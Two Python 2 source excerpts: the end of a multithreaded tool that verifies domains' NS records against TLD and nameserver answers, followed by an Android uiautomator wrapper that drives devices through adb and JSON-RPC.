if set(ns).intersection(set(domain_ns)):
domain_ns.append(n)
else:
flag = verify_ns_by_ip(domain, n, domain_ns)
if flag == 1:
domain_ns.append(n)
elif flag == 0:
tld_domain_invalid_ns.append(n)
else:
unknown_ns.append(n)
else: # 两级获取的ns完全不一样的情况
verify_strategy = 4
is_retry = True
logger.logger.info("域名:%s 两级ns无交集" % domain)
if ns_domain_del_ns: # ns不为空
tld_ip, tld_cname = [], []
tld_ip_dict, tld_cname_dict = {}, {}
for n in tld_domain_valid_ns:
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain,n)
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
tld_ip.extend(ipv4)
tld_cname.extend(cnames)
tld_ip_dict[n] = ipv4
tld_cname_dict[n] = cnames
ns_ip, ns_cname = [],[]
ns_ip_dict, ns_cname_dict = {}, {}
for n in ns_domain_del_ns:
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n)
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
ns_ip.extend(ipv4)
ns_cname.extend(cnames)
ns_ip_dict[n] = ipv4
ns_cname_dict[n] = cnames
if not (ns_ip or ns_cname) and (tld_ip or tld_cname): # ns返回的ip为空,tld返回的不为空
for n in tld_ip_dict:
domain_ns.append(n)
elif (ns_ip or ns_cname) and not (tld_ip or tld_cname): # ns返回ip不为空,tld返回为空
for n in ns_ip_dict:
domain_ns.append(n)
elif (ns_ip or ns_cname) and (tld_ip or tld_cname): # 都不为空
for n in tld_ip_dict:
if set(tld_ip_dict[n]).intersection(set(ns_ip)) or set(tld_cname_dict[n]).intersection(set(ns_cname)):
domain_ns.append(n)
else:
unknown_ns.append(n)
# print "无操作,修改程序"
for n in ns_ip_dict:
if set(ns_ip_dict[n]).intersection(set(tld_ip)) or set(ns_cname_dict[n]).intersection(
set(tld_cname)):
domain_ns.append(n)
else:
# print "无操作,修改程序"
unknown_ns.append(n)
else: # ns为空
for n in tld_domain_valid_ns: # 返回IP或cname
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n)
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
domain_ns.append(n)
else:
tld_domain_invalid_ns.append(n)
domain_ns.sort()
invalid_ns = list(set(ns_domain_invalid_ns + tld_domain_invalid_ns))
return domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy,is_retry
def master_control(tld_ns):
"""主线程控制"""
global domain_ns_result
global retry_domains
while queue.qsize():
logger.logger.info('存活线程: %s, 剩余任务: %s' % (threading.activeCount(),queue.qsize()))
domain, main_domain = queue.get()
print domain, main_domain
ns_by_tld, is_retry = obtain_domain_ns_by_tld(main_domain, tld_ns) # 通过顶级域名权威获取域名的ns
# print ns_by_tld, is_retry
if ns_by_tld:
domain_ns,tld_domain_ns,ns_domain_ns,invalid_ns, unknown_ns, verify_strategy,is_retry = obtaining_domain_ns_by_ns(domain,main_domain, ns_by_tld)
if is_retry and not domain_ns: # 重试为true,并且无有效ns时,则重试
retry_domains.append((domain, main_domain))
# ns_md5 = hashlib.md5(domain_ns).hexdigest()
else:
if is_retry:
retry_domains.append((domain, main_domain))
domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy = [], [], [], [], [], 0 # verify_strategy=0,表示没有获取tld的内容
insert_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
domain_ns_result[domain] = (domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy, insert_time)
# time.sleep(1)
queue.task_done()
def verify_ns_by_ip(domain, ns, intersection_ns):
"""
通过ip地址验证是否为有效ns
:param string domain: 要验证的domain
:param string ns: 要验证的ns
:param list intersection_ns: 已经确认的有效ns集合
:return: int flag : 1/0/-1, 1表示有效,0表示无效, -1表示未知
"""
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, ns)
verify_result = []
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
for n in intersection_ns:
n_ipv4, n_cnames, n_ip_cname_status = query_ip_cname_by_ns(domain, n)
if n_ip_cname_status == 'TRUE':
if set(ipv4).intersection(set(n_ipv4)) or set(cnames).intersection(set(n_cnames)):
verify_result.append(1)
break # 出现交集,则停止
else:
verify_result.append(-1) # 有ip地址,但是无交集
else:
verify_result.append(0)
else:
verify_result.append(0)
if 1 in verify_result:
return 1
elif -1 in verify_result:
return -1
else:
return 0
def save_to_file(id):
"""
将有效的ns存入到本地文件中
:param domain_ns:
:param id:
:return:
"""
global domain_ns_result
insert_time = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
path = './verified_domain_data/'
file_name = id+'_'+ insert_time
try:
fp = open(path+file_name,'w')
for domain in domain_ns_result:
domain_ns = domain_ns_result[domain][0]
domain_ns = ','.join(domain_ns)
if domain_ns:
fp.write(domain+'\t'+'NS'+'\t'+domain_ns+'\n')
fp.close()
return file_name
except Exception, e:
print e
return False
def read_domain_ns(file_name):
path = './verified_domain_data/'
with open(path+file_name,'r') as fp:
domain_ns = fp.read()
return domain_ns
def first_obtaining_domain_ns(domains,main_domains,tld_ns):
"""
第一次获取域名的有效ns记录
"""
create_queue(domains,main_domains)
worker_list = []
for q in range(thread_num): # 开始任务
worker = Thread(target=master_control,args=(tld_ns,))
worker.setDaemon(True)
worker.start()
worker_list.append(worker)
queue.join()
def retry_obtaining_domain_ns(tld_ns):
"""
再次探测第一次未成功获取ns的域名
"""
global retry_domains
if not retry_domains:
return
print '重新探测的域名数量:',len(retry_domains),retry_domains
create_retry_queue(retry_domains)
worker_list = []
for q in range(retry_thread_num): # 开始任务
worker = Thread(target=master_control, args=(tld_ns,))
worker.setDaemon(True)
worker.start()
worker_list.append(worker)
queue.join()
def obtaining_domain_ns(file_name,id):
"""主函数"""
logger.logger.info('开始解析域名的NS记录,线程数量为:%s' % thread_num)
tld_ns = fetch_tld_ns()
domains, main_domains = read_domains(file_name)
# if insert_domains_db(domains):
# logger.logger.info("成功将域名更新到数据库")
# else:
# logger.logger.info('将域名更新到数据库失败')
first_obtaining_domain_ns(domains, main_domains, tld_ns)
retry_obtaining_domain_ns(tld_ns)
if domain_ns_result:
# 更新数据库和文件,也使用两个子线程完成
logger.logger.info('更新数据库...')
update_domain_ns_db(id)
logger.logger.info('更新数据库完成')
logger.logger.info('存入文件...')
file_name = save_to_file(id)
logger.logger.info('存入文件完成')
for _ in range(3): # 重试三次
domain_ns = read_domain_ns(file_name)
flag = TaskConfirm(file_name,domain_ns,'query',id).task_confirm() # 发送探测完成消息
if isinstance(flag, bool): # 成功则停止发送
break
else:
logger.logger.error('实时探测域名有效NS,确认探测失败:%s' % flag)
logger.logger.info('结束解析域名的NS记录,线程数量为:%s' % thread_num)
def main():
# file_name = '../domain_data/domains_201907011111'
file_name = '../domain_data/top500.txt'
file_name = '../domain_data/test2.txt'
obtaining_domain_ns(file_name,'4')
# while True:
# obtaining_domain_ns()
# time.sleep(60)
if __name__ == '__main__':
file_name = sys.argv[1]
id = sys.argv[2]
obtaining_domain_ns(file_name, id)
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Python wrapper for Android uiautomator tool."""
import sys
import os
import traceback
import subprocess
import time
import base64
import itertools
import json
import hashlib
import socket,threading
import re,tempfile
import collections
import xml.dom.minidom
from functools import wraps
from imgUtil import ImageUtil
from comparison import isMatch, getMatchedCenterOffset
from chromdriver import ChromeDriver
try:
import urllib2
except ImportError:
import urllib.request as urllib2
try:
from httplib import HTTPException
except:
from http.client import HTTPException
try:
if os.name == 'nt':
import urllib3
except: # to fix python setup error on Windows.
pass
# Set default logging handler to avoid "No handler found" warnings.
import logging
__author__ = "Xiaocong He"
__all__ = ["device", "Device", "rect", "point", "Selector", "JsonRPCError"]
logger = logging.getLogger('auto_runner')
if len(logger.handlers) == 0:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(logging.INFO)
DEVICE_PORT = int(os.environ.get('UIAUTOMATOR_DEVICE_PORT', '9008'))
LOCAL_PORT = int(os.environ.get('UIAUTOMATOR_LOCAL_PORT', '9008'))
if 'localhost' not in os.environ.get('no_proxy', ''):
os.environ['no_proxy'] = "localhost,%s" % os.environ.get('no_proxy', '')
u2_version_code=21
reload(sys)
sys.setdefaultencoding('utf-8')
def U(x):
if sys.version_info.major == 2:
return x.decode('utf-8') if type(x) is str else x
elif sys.version_info.major == 3:
return x
def param_to_property(*props, **kwprops):
if props and kwprops:
raise SyntaxError("Can not set both props and kwprops at the same time.")
class Wrapper(object):
def __init__(self, func):
self.func = func
self.kwargs, self.args = {}, []
def __getattr__(self, attr):
if kwprops:
for prop_name, prop_values in kwprops.items():
if attr in prop_values and prop_name not in self.kwargs:
self.kwargs[prop_name] = attr
return self
elif attr in props:
self.args.append(attr)
return self
raise AttributeError("%s parameter is duplicated or not allowed!" % attr)
def __call__(self, *args, **kwargs):
if kwprops:
kwargs.update(self.kwargs)
self.kwargs = {}
return self.func(*args, **kwargs)
else:
new_args, self.args = self.args + list(args), []
return self.func(*new_args, **kwargs)
return Wrapper
def stopUiautomator(url):
port = url.split(":")[2].split("/")[0]
serial = None
try:
lines = systemCmd(['adb','forward','--list']).communicate()[0].decode("utf-8").strip().splitlines()
for s, lp, rp in [line.strip().split() for line in lines]:
if lp == 'tcp:%s'%port and rp=='tcp:9008':
serial = s
break
except:
pass
if serial:
os.system("adb -s %s shell am force-stop com.github.uiautomator"%serial)
def systemCmd(cmd_line):
'''exec system cmd, paramas list'''
if os.name != "nt":
cmd_line = [" ".join(cmd_line)]
return subprocess.Popen(cmd_line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
class JsonRPCError(Exception):
def __init__(self, code, message):
self.code = int(code)
self.message = message
def __str__(self):
return "JsonRPC Error code: %d, Message: %s" % (self.code, self.message)
class JsonRPCMethod(object):
if os.name == 'nt':
try:
pool = urllib3.PoolManager()
except:
pass
def __init__(self, url, method, timeout=30):
self.url, self.method, self.timeout = url, method, timeout
def __call__(self, *args, **kwargs):
if args and kwargs:
raise SyntaxError("Could not accept both *args and **kwargs as JSONRPC parameters.")
data = {"jsonrpc": "2.0", "method": self.method, "id": self.id()}
if args:
data["params"] = args
elif kwargs:
data["params"] = kwargs
params = data.get('params')[0] if data.get('params') else ""
if params:
try:
params = json.dumps({'parmas':params},ensure_ascii=False)
except:
params = str(params)
logger.info('exec u2 cmd: %s %s'%(self.method, params))
result = None
if os.name == "nt":
res = self.pool.urlopen("POST",
self.url,
headers={"Content-Type": "application/json"},
body=json.dumps(data).encode("utf-8"),
timeout=self.timeout)
content_type = res.headers['Content-Type']
result = res.data
else:
res = None
try:
req = urllib2.Request(self.url,
json.dumps(data).encode("utf-8"),
{"Content-type": "application/json"})
res = urllib2.urlopen(req, timeout=self.timeout)
content_type = res.info().getheader('Content-Type')
result = res.read()
finally:
if res is not None:
res.close()
if self.method == "screenshot":
if content_type == "image/png":
return result
jsonresult = json.loads(result.decode("utf-8"))
if "error" in jsonresult and jsonresult["error"]:
raise JsonRPCError(
jsonresult["error"]["code"],
"%s: %s" % (jsonresult["error"]["data"]["exceptionTypeName"], jsonresult["error"]["message"])
)
return jsonresult["result"]
def id(self):
m = hashlib.md5()
m.update(("%s at %f" % (self.method, time.time())).encode("utf-8"))
# m.update("i am uiautomator".encode("utf-8"))
return m.hexdigest()
class JsonRPCClient(object):
def __init__(self, url, timeout=30, method_class=JsonRPCMethod):
self.url = url
self.timeout = timeout
self.method_class = method_class
def __getattr__(self, method):
return self.method_class(self.url, method, timeout=self.timeout)
class Selector(dict):
"""The class is to build parameters for UiSelector passed to Android device.
"""
__fields = {
"text": (0x01, None), # MASK_TEXT,
"textContains": (0x02, None), # MASK_TEXTCONTAINS,
"textMatches": (0x04, None), # MASK_TEXTMATCHES,
"textStartsWith": (0x08, None), # MASK_TEXTSTARTSWITH,
"className": (0x10, None), # MASK_CLASSNAME
"classNameMatches": (0x20, None), # MASK_CLASSNAMEMATCHES
"description": (0x40, None), # MASK_DESCRIPTION
"descriptionContains": (0x80, None), # MASK_DESCRIPTIONCONTAINS
"descriptionMatches": (0x0100, None), # MASK_DESCRIPTIONMATCHES
"descriptionStartsWith": (0x0200, None), # MASK_DESCRIPTIONSTARTSWITH
"checkable": (0x0400, False), # MASK_CHECKABLE
"checked": (0x0800, False), # MASK_CHECKED
"clickable": (0x1000, False), # MASK_CLICKABLE
"longClickable": (0x2000, False), # MASK_LONGCLICKABLE,
"scrollable": (0x4000, False), # MASK_SCROLLABLE,
"enabled": (0x8000, False), # MASK_ENABLED,
"focusable": (0x010000, False), # MASK_FOCUSABLE,
"focused": (0x020000, False), # MASK_FOCUSED,
"selected": (0x040000, False), # MASK_SELECTED,
"packageName": (0x080000, None), # MASK_PACKAGENAME,
"packageNameMatches": (0x100000, None), # MASK_PACKAGENAMEMATCHES,
"resourceId": (0x200000, None), # MASK_RESOURCEID,
"resourceIdMatches": (0x400000, None), # MASK_RESOURCEIDMATCHES,
"index": (0x800000, 0), # MASK_INDEX,
"instance": (0x01000000, 0) # MASK_INSTANCE,
}
__mask, __childOrSibling, __childOrSiblingSelector = "mask", "childOrSibling", "childOrSiblingSelector"
def __init__(self, **kwargs):
super(Selector, self).__setitem__(self.__mask, 0)
super(Selector, self).__setitem__(self.__childOrSibling, [])
super(Selector, self).__setitem__(self.__childOrSiblingSelector, [])
for k in kwargs:
self[k] = kwargs[k]
def __setitem__(self, k, v):
if k in self.__fields:
super(Selector, self).__setitem__(U(k), U(v))
super(Selector, self).__setitem__(self.__mask, self[self.__mask] | self.__fields[k][0])
else:
raise ReferenceError("%s is not allowed." % k)
def __delitem__(self, k):
if k in self.__fields:
super(Selector, self).__delitem__(k)
super(Selector, self).__setitem__(self.__mask, self[self.__mask] & ~self.__fields[k][0])
def clone(self):
kwargs = dict((k, self[k]) for k in self
if k not in [self.__mask, self.__childOrSibling, self.__childOrSiblingSelector])
selector = Selector(**kwargs)
for v in self[self.__childOrSibling]:
selector[self.__childOrSibling].append(v)
for s in self[self.__childOrSiblingSelector]:
selector[self.__childOrSiblingSelector].append(s.clone())
return selector
def child(self, **kwargs):
self[self.__childOrSibling].append("child")
self[self.__childOrSiblingSelector].append(Selector(**kwargs))
return self
def sibling(self, **kwargs):
self[self.__childOrSibling].append("sibling")
self[self.__childOrSiblingSelector].append(Selector(**kwargs))
return self
child_selector, from_parent = child, sibling
def rect(top=0, left=0, bottom=100, right=100):
return {"top": top, "left": left, "bottom": bottom, "right": right}
def intersect(rect1, rect2):
top = rect1["top"] if rect1["top"] > rect2["top"] else rect2["top"]
bottom = rect1["bottom"] if rect1["bottom"] < rect2["bottom"] else rect2["bottom"]
left = rect1["left"] if rect1["left"] > rect2["left"] else rect2["left"]
right = rect1["right"] if rect1["right"] < rect2["right"] else rect2["right"]
return left, top, right, bottom
def point(x=0, y=0):
return {"x": x, "y": y}
class Adb(object):
def __init__(self, serial=None, adb_server_host=None, adb_server_port=None):
self.__adb_cmd = None
self.default_serial = serial if serial else os.environ.get("ANDROID_SERIAL", None)
self.adb_server_host = str(adb_server_host if adb_server_host else 'localhost')
self.adb_server_port = str(adb_server_port if adb_server_port else '5037')
self.adbHostPortOptions = []
if self.adb_server_host not in ['localhost', '127.0.0.1']:
self.adbHostPortOptions += ["-H", self.adb_server_host]
if self.adb_server_port != '5037':
self.adbHostPortOptions += ["-P", self.adb_server_port]
def adb(self):
if self.__adb_cmd is None:
if "ANDROID_HOME" in os.environ:
filename = "adb.exe" if os.name == 'nt' else "adb"
adb_cmd = os.path.join(os.environ["ANDROID_HOME"], "platform-tools", filename)
if not os.path.exists(adb_cmd):
raise EnvironmentError(
"Adb not found in $ANDROID_HOME path: %s." % os.environ["ANDROID_HOME"])
else:
import distutils
if "spawn" not in dir(distutils):
import distutils.spawn
adb_cmd = distutils.spawn.find_executable("adb")
if adb_cmd:
adb_cmd = os.path.realpath(adb_cmd)
else:
raise EnvironmentError("$ANDROID_HOME environment not set.")
self.__adb_cmd = adb_cmd
return self.__adb_cmd
def cmd(self, *args, **kwargs):
'''adb command, add -s serial by default. return the subprocess.Popen object.'''
serial = self.device_serial()
if serial:
if " " in serial: # TODO how to include special chars on command line
serial = "'%s'" % serial
return self.raw_cmd(*["-s", serial] + list(args))
else:
return self.raw_cmd(*args)
def raw_cmd(self, *args):
'''adb command. return the subprocess.Popen object.'''
cmd_line = [self.adb()] + self.adbHostPortOptions + list(args)
if os.name != "nt":
cmd_line = [" ".join(cmd_line)]
logger.info('exec adb cmd: %s'%" ".join(cmd_line))
return subprocess.Popen(cmd_line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def device_serial(self):
if not self.default_serial:
devices = self.devices()
if devices:
if len(devices):
self.default_serial = list(devices.keys())[0]
else:
raise EnvironmentError("not device found.")
else:
raise EnvironmentError("Device not attached.")
return self.default_serial
def devices(self):
'''get a dict of attached devices. key is the device serial, value is device name.'''
out = self.raw_cmd("devices").communicate()[0].decode("utf-8")
match = "List of devices attached"
index = out.find(match)
if index < 0:
raise EnvironmentError("adb is not working.")
return dict([s.split("\t") for s in out[index + len(match):].strip().splitlines() if s.strip()])
def forward(self, local_port, device_port):
'''adb port forward. return 0 if success, else non-zero.'''
return self.cmd("forward", "tcp:%s" % local_port, "tcp:%s" % device_port).wait()
def forward_localabstract(self,local_port, localabstract):
'''adb port forward. return 0 if success, else non-zero.'''
return self.cmd("forward", "tcp:%s" % local_port, localabstract).wait()
def forward_list(self):
'''adb forward --list'''
version = self.version()
if int(version[1]) <= 1 and int(version[2]) <= 0 and int(version[3]) < 31:
raise EnvironmentError("Low adb version.")
lines = self.raw_cmd("forward", "--list").communicate()[0].decode("utf-8").strip().splitlines()
return [line.strip().split() for line in lines]
def remove_forward_port(self,port):
self.cmd("forward", "--remove", "tcp:%s" % port).wait()
def version(self):
'''adb version'''
match = re.search(r"(\d+)\.(\d+)\.(\d+)", self.raw_cmd("version").communicate()[0].decode("utf-8"))
return [match.group(i) for i in range(4)]
def getVersionCode(self, packageName):
'''adb dumpsys package myPackageName'''
versionCode = 0
try:
out = self.cmd('shell','dumpsys', 'package', packageName).communicate()[0]
for line in out.strip().splitlines():
tmp = line.strip()
if tmp.startswith("versionCode="):
versionCode = int(tmp.split(" ")[0].split("=")[1])
break
except:
pass
return versionCode
def checkPackageStatus(self, packageName='com.github.uiautomator'): # 包已卸载,需要确定文件实体
try:
out = self.cmd('shell','dumpsys', 'package', packageName).communicate()[0]
for line in out.strip().splitlines():
tmp = line.strip()
if tmp.find('Unable to find package: %s'%packageName) == -1:
return True
except:
pass
return False
def current_app(self):
'''return packagename activity'''
out = self.cmd('shell','dumpsys', 'window', 'w').communicate()[0]
flag = False
packageName = None
for line in out.strip().splitlines():
if 'mCurrentFocus' in line:
current_info = line[:-1].split(" ")[4]
if "/" in current_info:
return (current_info.split('/')[0],current_info.split('/')[1])
else:
if current_info.split('/')[0] == "StatusBar":
return (current_info.split('/')[0],None)
else:
flag = True
packageName = current_info.split('/')[0]
if flag and "mFocusedApp" in line:
return (packageName, line[line.find(packageName)+len(packageName)+1:].split(" ")[0])
def start_app(self, package_activity):
'''start app'''
out = self.cmd('shell','am', 'start', package_activity).communicate()[0]
result = []
for line in out.strip().splitlines():
tmp = line.strip()
result.append(tmp)
return result
def shell(self, *args, **kwargs):
'''adb shell command'''
self.cmd(*['shell'] + list(args)).wait()
def force_stop(self, packageName):
'''force stop package'''
self.shell('am','force-stop', packageName)
def install(self, params, apkpath):
out = self.cmd('install', params, apkpath).communicate()[0].strip().splitlines()
return out
def stop_third_app(self, ignore_filter=["com.tencent.mm"]):
'''force stop third app'''
ignore_filter_target = ['com.github.uiautomator','com.github.uiautomator.test']
ignore_filter_target += ignore_filter
for line in self.cmd('shell','pm','list','package','-3').communicate()[0].strip().splitlines():
if 'package:' in line:
package_name = line[len('package:'):]
if not package_name in ignore_filter_target:
self.force_stop(package_name)
@property
def airplane_mode(self):
my_self = self
class _AirplaneMode(object):
def on(self):
my_self.shell('settings put global airplane_mode_on 1')
time.sleep(2)
my_self.shell('am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true')
def off(self):
my_self.shell('settings put global airplane_mode_on 0')
time.sleep(2)
my_self.shell('am broadcast -a android.intent.action.AIRPLANE_MODE --ez state false')
return _AirplaneMode()
@property
def ime(self): # 输入法相关操作
myself = self
class IME(object):
def availables(self):
return filter(lambda x:True if x else False, myself.cmd('shell','ime','list','-s').communicate()[0].strip().splitlines())
def default(self):
return myself.cmd('shell','settings','get','secure','default_input_method').communicate()[0].strip().splitlines()
def enable(self, imeId):
myself.shell('ime', 'enable', imeId)
def disable(self, imeId):
myself.shell('ime', 'disable', imeId)
def set(self, imeId):
myself.shell('ime', 'set', imeId)
return IME()
_init_local_port = LOCAL_PORT - 1
def next_local_port(adbHost=None):
def is_port_listening(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = s.connect_ex((str(adbHost) if adbHost else '127.0.0.1', port))
s.close()
return result == 0
global _init_local_port
_init_local_port = _init_local_port + 1 if _init_local_port < 32764 else LOCAL_PORT
while is_port_listening(_init_local_port):
_init_local_port += 1
return _init_local_port
class NotFoundHandler(object):
'''
Handler for UI Object Not Found exception.
It's a replacement of UiAutomator watcher on device side.
'''
def __init__(self):
self.__handlers = collections.defaultdict(lambda: {'on': True, 'handlers': []})
def __get__(self, instance, type):
return self.__handlers[instance.adb.device_serial()]
class AutomatorServer(object):
"""start and quit rpc server on device.
"""
__jar_files = {
"bundle.jar": "libs/bundle.jar",
"uiautomator-stub.jar": "libs/uiautomator-stub.jar"
}
__apk_files = ["libs/app-uiautomator.apk", "libs/app-uiautomator-test.apk"]
__sdk = 0
handlers = NotFoundHandler() # handler UI Not Found exception
def __init__(self, serial=None, local_port=None, device_port=None, adb_server_host=None, adb_server_port=None):
self.uiautomator_process = None
self.adb = Adb(serial=serial, adb_server_host=adb_server_host, adb_server_port=adb_server_port)
self.device_port = int(device_port) if device_port else DEVICE_PORT
if local_port:
self.local_port = local_port
else:
try: # first we will try to use the local port already adb forwarded
for s, lp, rp in self.adb.forward_list():
if s == self.adb.device_serial() and rp == 'tcp:%s'%self.device_port:
self.local_port = int(lp[4:])
break
else:
self.local_port = next_local_port(adb_server_host)
except:
self.local_port = next_local_port(adb_server_host)
self.wait_time = 0
def set_think_time(self, wait_time):
self.wait_time = wait_time
def push(self):
base_dir = os.path.dirname(__file__)
for jar, url in self.__jar_files.items():
filename = os.path.join(base_dir, url)
self.adb.cmd("push", filename, "/data/local/tmp/").wait()
return list(self.__jar_files.keys())
def install(self):
base_dir = os.path.dirname(__file__)
for apk in self.__apk_files:
self.adb.cmd("install", "-r", "-t", os.path.join(base_dir, apk)).wait()
def uninstall(self):
self.adb.cmd('uninstall','com.github.uiautomator').wait()
self.adb.cmd('uninstall', 'com.github.uiautomator.test').wait()
@property
def jsonrpc(self):
if self.wait_time != 0:
time.sleep(self.wait_time)
return self.jsonrpc_wrap(timeout=int(os.environ.get("jsonrpc_timeout", 90)))
def jsonrpc_wrap(self, timeout):
server = self
ERROR_CODE_BASE = -32000
def _JsonRPCMethod(url, method, timeout, restart=True):
_method_obj = JsonRPCMethod(url, method, timeout)
def wrapper(*args, **kwargs):
URLError = urllib3.exceptions.HTTPError if os.name == "nt" else urllib2.URLError
try:
return _method_obj(*args, **kwargs)
except (URLError, socket.error, HTTPException) as e:
if restart:
server.stop()
server.start(timeout=30)
return _JsonRPCMethod(url, method, timeout, False)(*args, **kwargs)
else:
raise
except JsonRPCError as e:
if e.code >= ERROR_CODE_BASE - 1:
server.stop()
server.start()
return _method_obj(*args, **kwargs)
elif e.code == ERROR_CODE_BASE - 2 and self.handlers['on']: # Not Found
try:
self.handlers['on'] = False
# any handler returns True will break the left handlers
any(handler(self.handlers.get('device', None)) for handler in self.handlers['handlers'])
finally:
self.handlers['on'] = True
return _method_obj(*args, **kwargs)
raise
return wrapper
return JsonRPCClient(self.rpc_uri,
timeout=timeout,
method_class=_JsonRPCMethod)
def __jsonrpc(self):
return JsonRPCClient(self.rpc_uri, timeout=int(os.environ.get("JSONRPC_TIMEOUT", 90)))
def sdk_version(self):
'''sdk version of connected device.'''
if self.__sdk == 0:
try:
self.__sdk = int(self.adb.cmd("shell", "getprop", "ro.build.version.sdk").communicate()[0].decode("utf-8").strip())
except:
pass
return self.__sdk
def start(self,timeout=5):
'''add retry 2 times'''
try:
time.sleep(4) # startup delay 4 seconds
self._start(timeout)
except:
self.uninstall()
self.stop()
time.sleep(4)
self._start(timeout)
def _start(self, timeout=5):
sdk = self.sdk_version()
if sdk != 0 and sdk < 18:
files = self.push()
cmd = list(itertools.chain(
["shell", "uiautomator", "runtest"],
files,
["-c", "com.github.uiautomatorstub.Stub"],
["--nohup"]
))
else:
if self.checkVersion():
self.install()
cmd = ["shell", "am", "instrument", "-r", "-w",
"com.github.uiautomator.test/android.support.test.runner.AndroidJUnitRunner"]
self.uiautomator_process = self.adb.cmd(*cmd)
self.adb.forward(self.local_port, self.device_port)
time.sleep(4)
while not self.alive and timeout > 0:
time.sleep(0.5)
timeout -= 0.5
if not self.alive:
raise IOError("RPC server not started!")
def ping(self):
try:
return self.__jsonrpc().ping()
except:
pass
def checkVersion(self):
''' check uiautomator apk version '''
version_code = self.adb.getVersionCode('com.github.uiautomator')
package_status = self.adb.checkPackageStatus('com.github.uiautomator')
return True if (u2_version_code > version_code) or not package_status else False
@property
def alive(self):
'''Check if the rpc server is alive.'''
return self.ping() == "pong"
def stop(self):
'''Stop the rpc server.'''
if self.uiautomator_process and self.uiautomator_process.poll() is None:
res = None
try:
res = urllib2.urlopen(self.stop_uri)
self.uiautomator_process.wait()
except:
self.uiautomator_process.kill()
finally:
if res is not None:
res.close()
self.uiautomator_process = None
try:
out = self.adb.cmd("shell", "ps", "-C", "uiautomator").communicate()[0].decode("utf-8").strip().splitlines()
if out:
index = out[0].split().index("PID")
for line in out[1:]:
if len(line.split()) > index:
self.adb.cmd("shell", "kill", "-9", line.split()[index]).wait()
except:
pass
try:
self.adb.cmd("shell", "am", "force-stop", 'com.github.uiautomator').wait()
except:
pass
@property
def stop_uri(self):
return "http://%s:%d/stop" % (self.adb.adb_server_host, self.local_port)
@property
def rpc_uri(self):
return "http://%s:%d/jsonrpc/0" % (self.adb.adb_server_host, self.local_port)
@property
def screenshot_uri(self):
return "http://%s:%d/screenshot/0" % (self.adb.adb_server_host, self.local_port)
def screenshot(self, filename=None, scale=1.0, quality=100):
if self.sdk_version() >= 18:
try:
req = urllib2.Request("%s?scale=%s&quality=%s" % (self.screenshot_uri, scale, quality))
result = urllib2.urlopen(req, timeout=30)
if filename:
with open(filename, 'wb') as f:
f.write(result.read())
return filename
else:
return result.read()
except:
pass
return None
class AutomatorDevice(object):
'''uiautomator wrapper of android device'''
__orientation = ( # device orientation
(0, "natural", "n", 0),
(1, "left", "l", 90),
(2, "upsidedown", "u", 180),
(3, "right", "r", 270)
)
__alias = {
"width": "displayWidth",
"height": "displayHeight"
}
def __init__(self, serial=None, local_port=None, adb_server_host=None, adb_server_port=None):
self.server = AutomatorServer(
serial=serial,
local_port=local_port,
adb_server_host=adb_server_host,
adb_server_port=adb_server_port
)
self.adb = self.server.adb
self.webdriver = None
def set_think_time(self,wait_time):
'''uiautomator steps wait time'''
self.server.set_think_time(wait_time)
def set_debug(self, mode):
'''uiautomator debug mode pring log'''
logger.setLevel(mode)
def __call__(self, **kwargs):
return AutomatorDeviceObject(self, Selector(**kwargs))
def __getattr__(self, attr):
'''alias of fields in info property.'''
info = self.info
if attr in info:
return info[attr]
elif attr in self.__alias:
return info[self.__alias[attr]]
else:
raise AttributeError("%s attribute not found!" % attr)
@property
def info(self):
'''Get the device info.'''
return self.server.jsonrpc.deviceInfo()
def click(self, x, y):
'''click at arbitrary coordinates.'''
return self.server.jsonrpc.click(x, y)
def long_click(self, x, y, duration=0):
'''long click at arbitrary coordinates.'''
return self.server.jsonrpc.long_click(x, y, duration)
def swipe(self, sx, sy, ex, ey, steps=100):
return self.server.jsonrpc.swipe(sx, sy, ex, ey, steps)
def swipePoints(self, points, steps=100):
ppoints = []
for p in points:
ppoints.append(p[0])
ppoints.append(p[1])
return self.server.jsonrpc.swipePoints(ppoints, steps)
def drag(self, sx, sy, ex, ey, steps=100):
'''Swipe from one point to another point.'''
return self.server.jsonrpc.drag(sx, sy, ex, ey, steps)
def dump(self, filename=None, compressed=True, pretty=True):
'''dump device window and pull to local file.'''
content = self.server.jsonrpc.dumpWindowHierarchy(compressed, None)
if filename:
with open(filename, "wb") as f:
f.write(content.encode("utf-8"))
if pretty and "\n " not in content:
xml_text = xml.dom.minidom.parseString(content.encode("utf-8"))
content = U(xml_text.toprettyxml(indent=' '))
return content
def screenshot(self, filename=None, scale=1.0, quality=100):
'''take screenshot.'''
result = self.server.screenshot(filename, scale, quality)
if result:
return result
if filename is None:
filename = tempfile.mktemp()
png = "/data/local/tmp/screen_shot.png"
self.server.adb.cmd("shell", "screencap", "-p", png).wait()
self.server.adb.cmd("pull", png, filename).wait()
self.server.adb.cmd("shell", "rm", png).wait()
if os.path.exists(filename):
with open(filename,'rb') as f:
return f.read()
def screenshot_custom(self, filename='task_image_name.jpg', fomart='jpeg', quality=100):
'''
take screenshot custom
fomart: 'jpeg, png, webp'
quality: compress ratio
'''
result = self.server.jsonrpc.screenshot_custom(filename, fomart, quality)
return result
@property
def takeScreenshot(self):
my_self = self
class _ScreenShot(object):
def device(self, filename=None, scale=1.0, quality=100):
return my_self.screenshot(filename, scale, quality)
def custom(self, filename='task_image_name.jpg', fomart='jpeg', quality=100):
'''
